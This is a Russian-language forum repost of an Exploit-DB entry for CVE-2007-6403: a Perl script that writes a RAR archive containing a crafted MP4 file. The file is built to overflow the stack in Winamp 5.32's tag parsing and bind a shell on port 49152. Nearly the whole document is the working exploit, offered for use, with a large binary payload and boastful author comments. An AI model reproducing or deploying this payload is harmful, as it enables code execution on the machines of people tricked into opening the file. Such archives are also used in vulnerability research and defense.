Exploit NullSoft Winamp 5.32 - .MP4 Tags Stack Overflow

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
4703
Проверка EDB
  1. Пройдено
Автор
SYS 49152
Тип уязвимости
LOCAL
Платформа
WINDOWS
CVE
cve-2007-6403
Дата публикации
2007-12-08
Код:
#!/bin/perl
#
# Nullsoft Winamp MP4 tags Stack Overflow 
# 
# 0-day discovered and exploited by SYS 49152
# 
# Tested on win XP SP2 ENG
# Tuned for Nullsoft Winamp 5.32 d.i.
# Shell on port 49152
# 
# usage:
# well, not much fun for you kids here ..
# to get the shell you have to use ALT+3 and press UPDATE. 
# Instead this one is VERY interesting for the exploiters around..
# this is an unicode sploit where in addition about half
# of the 0x0-0xff range can't be used..
# I'm quite curious to see if someone understands how I did..
# if this is the case drop me a mail with the magic word
# to gforce(put the @ here)operamail(put the . here)com
# 
# btw 
# due to some complaints by some kids that were having serious
# problems in using winzip, this time I tried with winrar :-)
#
#
#update:
#the latest 5.5 seems patched.
#the winamp version 5.32 reflects the date when I last updated 
#this code, 'cause I exploited this one more than an year ago.
#I see that marsu exploited the same bug about six months ago,
#when I did the big mistake to show this one to some "friends"..
#I'm sure that marsu can even give the details on how this bug works :-)



# begin binary data:
my $rar_data = # code 724983
"\x52\x61\x72\x21\x1A\x07\x00\xCF\x90\x73\x00\x00\x0D\x00\x00".
"\x00\x00\x00\x00\x00\xBF\x95\x74\x20\x80\x3C\x00\x5A\x04\x00".
"\x00\x70\x09\x00\x00\x02\x0B\x7C\xFB\x08\xB3\xB0\x24\x36\x1D".
"\x33\x1C\x00\x20\x00\x00\x00\x53\x59\x53\x5F\x34\x39\x31\x35".
"\x32\x5F\x4D\x50\x34\x5F\x66\x6F\x72\x5F\x77\x69\x6E\x61\x6D".
"\x70\x2E\x6D\x70\x34\x0C\x1D\x51\x10\x8D\x0F\xCD\x81\x1C\x8A".
"\x25\xAE\x74\x6C\x6C\x18\xC6\xDE\x86\xF5\x9C\x64\xDD\x9B\xB3".
"\x66\xF3\x93\x84\xE7\x14\xE1\xBB\x3E\x0A\x4E\x31\x1A\xDE\xC8".
"\xC4\xD9\xAD\xA7\xA4\x73\xA8\x33\xE0\xD8\x33\xE4\xF1\x98\xF4".
"\x6D\x90\x0C\x03\x03\x00\xD0\x7B\x06\x31\x8F\xE2\x44\xB5\x4E".
"\x93\x94\xE1\x22\x51\x45\x03\x0C\xCC\x30\x18\x66\x7F\x0B\x16".
"\xE0\x0D\x83\xC1\xD8\x3E\x3B\xBB\x12\x93\xF8\x0D\xAC\xC5\x79".
"\x77\xEA\xAA\xF5\x7C\x78\x5E\x7F\x35\x74\xBD\x75\x5E\x55\xF1".
"\xF5\x2F\xDE\xF5\xDD\x5D\xDD\x25\x4A\xF8\xD2\xBE\x16\x92\x04".
"\x17\xDF\xB2\xAC\xDC\xDD\x0E\x6D\x06\x62\xAD\x0C\xAC\x93\x92".
"\x0F\xCE\xAF\xCB\xA1\xCB\xFD\x19\x08\x10\x7B\x25\xA0\xBA\x9E".
"\xC5\xEF\x6B\xF1\xE9\x70\xFF\x7C\xFE\x14\x16\x3B\x81\xB6\xFB".
"\xEC\xFB\xF2\x55\xA8\x07\xDF\xA5\x57\x80\xE7\x63\x1D\x63\xFD".
"\xCC\xCF\xB3\xA5\x59\x2A\x73\xD4\x67\x67\x66\x7A\x0E\x6F\xBD".
"\xB5\x39\x9E\x25\x60\xD8\x90\x6F\x0A\x85\x56\x55\xFE\x4A\x85".
"\x6A\x3D\x08\xAB\x6F\xF8\x67\xAB\x3A\xBF\x8B\xBB\xF3\x79\xD4".
"\x66\x77\xCE\xA3\xA9\xDB\x1B\x21\x50\x08\xF5\x3D\xCA\xF2\xEF".
"\x7D\x5D\xE4\xFD\x9E\xE7\x5F\xB5\xD8\x4F\xDD\xF9\xFE\x4F\x8F".
"\xEB\x4F\xD6\x4F\x56\x08\xC6\x0A\xBA\xB0\xBB\x75\xA1\xC8\x1D".
"\xCE\xE1\x32\x77\x29\x36\x5B\xFC\x04\x58\xCD\x8B\x68\xCC\xD9".
"\x51\x8D\x08\x41\xC2\xDF\x21\xE3\xFE\x47\xB2\x0D\x75\x2C\x7E".
"\x09\xA5\x78\xD6\x95\x10\x42\x38\x56\xD5\xD6\xDF\x9F\x3B\x74".
"\x8E\x2E\x32\xD8\x42\x25\xDB\x22\x75\x96\xDB\x41\x48\x6A\xFE".
"\x94\x56\xB3\xE3\xAD\xA5\x3A\x25\x36\xAC\xEA\xC5\x8B\x4A\x6B".
"\x32\xF9\xD9\xFD\x2C\x2F\x6F\x48\xD9\xAF\xE8\x44\xE2\x1D\x9C".
"\x8A\x9E\x49\x57\x99\x08\x57\x95\xF9\x0C\xDA\x97\xA4\xB4\x96".
"\x4E\xCC\x63\xA8\x56\x9B\x03\xF6\x3D\xE1\xA2\x95\x20\x33\xC0".
"\x60\x54\xD7\x33\xF7\x6D\xEB\x13\xFF\x64\xC6\x94\x45\xA6\x34".
"\xD8\x23\x99\xA0\xB2\xE3\x41\x58\x16\xE9\x92\x30\xB4\xE0\x4D".
"\x26\x1C\x71\xDD\xBE\xA2\x24\xDA\x30\xA4\x51\xB5\xA8\x0C\xEE".
"\xB0\xD2\xCB\x75\x72\xC7\x70\xE8\x6F\x71\x56\xF2\xCB\xAA\xF1".
"\xD9\xF2\xC9\xA8\xDB\x4A\x78\x9A\x3D\x10\x84\x68\x7A\x63\xEC".
"\x87\xFA\x84\x63\x79\x46\xEB\xBC\xA1\x31\xC1\xE0\x3B\xA1\x2D".
"\xD7\x32\xCB\xCE\xC0\x0F\x40\x2C\x9E\x33\x3B\x4D\xF1\x91\xD7".
"\x0F\xB0\x11\xF6\xC8\x2E\x16\xE8\x1A\x47\x08\xE2\x46\xC7\x23".
"\x00\x8A\x65\xB0\x63\x61\x39\x68\x36\x47\x24\xC2\xDA\xE9\x07".
"\xFB\x80\x43\x46\x97\x40\x1B\x6A\xE0\x3A\xBC\xEE\x7B\x5A\x60".
"\x66\x4C\x10\xB7\xF3\x89\x99\x28\x13\x38\x01\x1E\x00\x65\x70".
"\x3E\x01\xA2\x9E\x8D\x52\x43\x72\x63\x5A\x0F\x1E\x96\xD5\x89".
"\xEC\x3F\x2D\xBB\x6E\x8B\x60\x9B\x09\x9F\x26\x8F\x41\x8F\x74".
"\xE7\xCA\xDE\xA6\x28\xB4\x75\x75\x2A\x31\xFC\x8C\x0F\xC9\x4A".
"\x00\x86\xCC\xDE\xB9\xBE\xD5\xC5\xE5\x02\x8E\xA1\x09\xE1\x32".
"\x7C\x74\x38\xB5\xE7\xC9\x7C\x0D\x6D\x37\xB4\xF8\x26\xD4\x7A".
"\x21\x16\x85\xC3\x97\xDE\x85\xBE\xA5\x0E\x68\x28\xAA\x02\xB5".
"\x04\xF6\x3C\x6D\x10\x3B\xDC\x6F\x58\x13\x41\x6B\x86\x05\xDC".
"\xB4\xDD\x1A\xEB\x68\x8E\x00\xE7\xC5\x66\x87\x1D\x37\x57\x09".
"\x0A\x1C\x6C\x4C\x14\x98\xF8\x69\x79\x84\xB8\xB7\x7C\x46\x93".
"\x0D\x0D\xB7\xC5\xC1\xC0\x46\x99\x36\x1A\x2C\x2C\x2E\x67\x1D".
"\x1A\x2C\x54\x56\x92\x14\x58\x16\x5A\x34\xB7\xF8\x1D\xFF\x5F".
"\x90\xEF\x25\xEB\xCD\x5C\xC0\x05\xF1\x7E\x8D\x22\x5C\x7C\x7C".
"\x4B\xF4\x58\xDD\x54\x58\x37\x70\x04\x69\x53\x58\x58\x38\x77".
"\x55\xA4\x06\x0E\x4D\x8C\x93\x07\x1B\x09\x1F\x4E\x1E\x43\xD2".
"\xEC\x9A\xDC\xA5\xBF\xC2\x44\x9A\xBE\x6E\x86\x9F\xED\xF5\xF9".
"\x0E\xB1\xEE\xF5\xFB\x1E\xF7\x67\xB5\xEF\xF6\xFE\x0E\xE7\xFE".
"\x6D\xC8\xAF\x2C\xA3\xAF\x7F\x31\xA9\xE8\xB8\x49\xE6\x7C\x54".
"\x91\x8D\x9D\x32\x9A\xE9\xD6\x66\xA7\xD2\x87\x8C\x8E\xC7\x39".
"\x4E\x5E\x55\x8F\xCA\xB7\x43\x05\x3F\x17\xCC\xB0\x96\xA2\x98".
"\xC5\x91\x42\x3A\xA1\x16\x0D\x57\x9B\x66\xF1\x6B\x95\x18\x32".
"\x57\xB8\xB4\x1D\x15\x01\xC5\x4D\xD8\x26\x41\x90\x01\x09\x6E".
"\x1F\x48\x24\x43\x84\x40\xAC\x4E\x6B\xB9\xCC\xE7\x5A\xC2\xA6".
"\xDD\xC1\x8F\x22\x55\x77\x34\x97\x93\x6B\x6C\xCE\xAE\xF6\x5C".
"\x14\xE6\x28\x0D\x15\x2E\x01\x81\xB2\x25\x6C\x51\xE1\x3B\x2E".
"\x1B\x43\xD9\x86\x5C\x25\xF4\x74\x84\x35\xBA\xC3\x77\xEC\x92".
"\xF4\x48\xD4\xE3\xA6\xD2\x38\x3A\xB3\x52\x3E\xF5\x49\x11\xA9".
"\x32\x89\xC8\xDF\x8C\xDE\x10\xC8\x73\x2C\x05\x47\xA1\xB2\x4B".
"\x0D\x5E\x59\xCF\xE9\x14\x1A\x57\x1D\x02\x7F\xD4\x97\x13\xF7".
"\x77\x70\xD6\xD7\xA1\x31\x68\xBD\x9C\x00\xC9\xFC\x75\x0B\x6F".
"\xC2\x50\x4B\xEF\x09\xAA\x09\x9C\xB8\xDB\x64\xF0\xAF\x38\x08".
"\xD9\xC1\xD3\x5D\x6B\x30\x16\xB4\x68\xC5\xC7\xD2\x2E\x4C\xAB".
"\x75\xCE\xC5\x81\x0E\xBB\x7E\x83\x2D\xC3\x35\x16\x10\xD1\x79".
"\x63\x2E\x1D\xC2\xE9\xEF\x9B\x96\x0A\x52\xF5\xA4\x35\x5C\x63".
"\xD8\xC6\x1E\x55\xEE\xF8\x7D\xDE\x0F\x09\xD4\x20\x4E\xAF\x3F".
"\x2E\xE8\xE9\x0E\x8F\x55\x13\xE4\xA9\xF1\x65\xFF\xC2\xF4\xAA".
"\xD5\x67\x66\x9C\x90\x9D\x08\x8E\xDE\x26\x46\x72\x9B\xBF\x97".
"\x18\x1E\xAA\x9F\x69\x50\x01\xFF\x10\xC4\x3D\x7B\x00\x40\x07".
"\x00";
# size = 1201 bytes

open(code, ">unrarme.rar") || die "Can't Write temporary File\n";
binmode (code);
print code $rar_data;
close (code);
print "\nFile ready, have fun..\n";

# milw0rm.com [2007-12-08]
 
Источник
www.exploit-db.com

Похожие темы